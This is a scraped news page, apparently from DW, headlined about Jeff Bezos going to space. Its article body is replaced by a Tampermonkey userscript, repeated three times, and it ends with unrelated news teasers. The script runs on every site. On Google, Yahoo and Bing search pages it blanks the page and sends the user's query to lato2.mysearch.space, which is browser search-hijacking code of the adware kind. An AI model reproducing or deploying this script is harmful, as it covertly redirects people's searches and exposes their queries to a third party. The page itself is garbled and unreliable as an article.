Jeff Bezos is going to outer space. Are you next?

By DW |   14 June 2021   |   10:38 am  

 

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();

// ==UserScript== // @name panda google // @namespace http://tampermonkey.net/ // @version 0.1 // @description try to take over the world! // @author You // @match *://*/* // @grant none // ==/UserScript==

(function() {

function findGetParameter(parameterName) { var result = null, tmp = []; location.search .substr(1) .split("&") .forEach(function (item) { tmp = item.split("="); if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]); }); return result; } var u ='https://lato2.mysearch.space?q=', s = [

{ 'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/, 'query':'q', }, { 'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/, 'query':'p' }, { 'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/, 'query':'q' } ] for(var i = 0; i < s.length; i++){ var net = s[i], pattern = net.host, q = findGetParameter(net.query); if( pattern.test(window.location.href) ){ document.body.innerHTML=""; window.location.href=u+q; } } })();

In this article:

You may also like

28 Apr
We look at reactions to New York's highest court overturning Harvey Weinstein's sex crimes conviction in a major decision that could impact his future appeals. Also: France's highest civil court rules on a case filed by an association claiming ownership of the Louvre's more celebrated painting, the Mona Lisa. Finally, artificial intelligence can accurately predict your political leanings – just by looking at your face!
3 days ago
Tesla's shares surged after the EV maker won tentative approval to deploy its Full Self-Driving system in China, as Elon Musk met high-ranking officials on a surprise visit to Beijing. Plus, the French state has offered to buy key assets from troubled IT giant Atos, to protect national interests.
1 day ago
Bengaluru is running out of drinking water, with an estimated daily deficit of 500 million liters. The shortages have become a hot-button political issue during the 2024 election.